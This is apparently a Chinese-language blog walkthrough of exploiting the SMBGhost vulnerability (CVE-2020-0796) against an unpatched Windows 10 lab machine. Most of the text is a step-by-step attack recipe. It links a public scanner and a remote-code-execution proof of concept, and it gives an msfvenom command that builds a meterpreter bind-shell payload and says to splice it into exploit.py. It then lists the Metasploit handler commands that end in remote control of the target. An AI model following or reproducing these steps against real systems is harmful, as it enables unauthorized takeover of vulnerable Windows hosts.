永恒之黑简介

(同样的这里也对永恒之黑的做个简介,不感兴趣的自动跳过^^)

微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不

亚于永恒之蓝,全球10万台服务器或成首轮攻击目标。

注意事项

永恒之黑是针对win10 20之前的版本,之后的版本就修复了该漏洞,因此下镜像的时候同样也要注意一下版本

攻击过程

(前面的攻击过程和永恒之蓝差不多,这里就稍微带一下,具体的可以去看上篇文章QAQ)

使用SMBGhost中的scanner.py可以查看靶机是否有该漏洞,下载地址:https://github.com/ly4k/SMBGhost/blob/master/scanner.py

clip_image002

用msfvenom生成shellcode来反弹shell,指令如下

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

b1

之后使用SMBGhost中的payload,下载地址如下:https://github.com/chompie1337/SMBGhost_RCE_PoC

打开其中的exploit.py,下图所在位置的shellcode替换成我们上面生成的shellcode,注意要把buf全部换成USER_PAYLOAD

b2

输入msfconsole打开终端(msf终端每次开出来的都不一样,感兴趣的可以多刷几次看看)

image-20220121145643517

先是使用此攻击模块

use exploit/multi/handler

之后设置payload

set payload windows/x64/meterpreter/bind_tcp

设置靶机ip和本机端口

set lport 4444
set rhost 靶机ip

b4

运行刚才的exploit.py

b5

之后便来到了熟悉的meterpreter界面,成功夺取控制权,具体在meterpreter可以进行的操作可以看上一篇^^

b6


目之所及,心之所向,永生难忘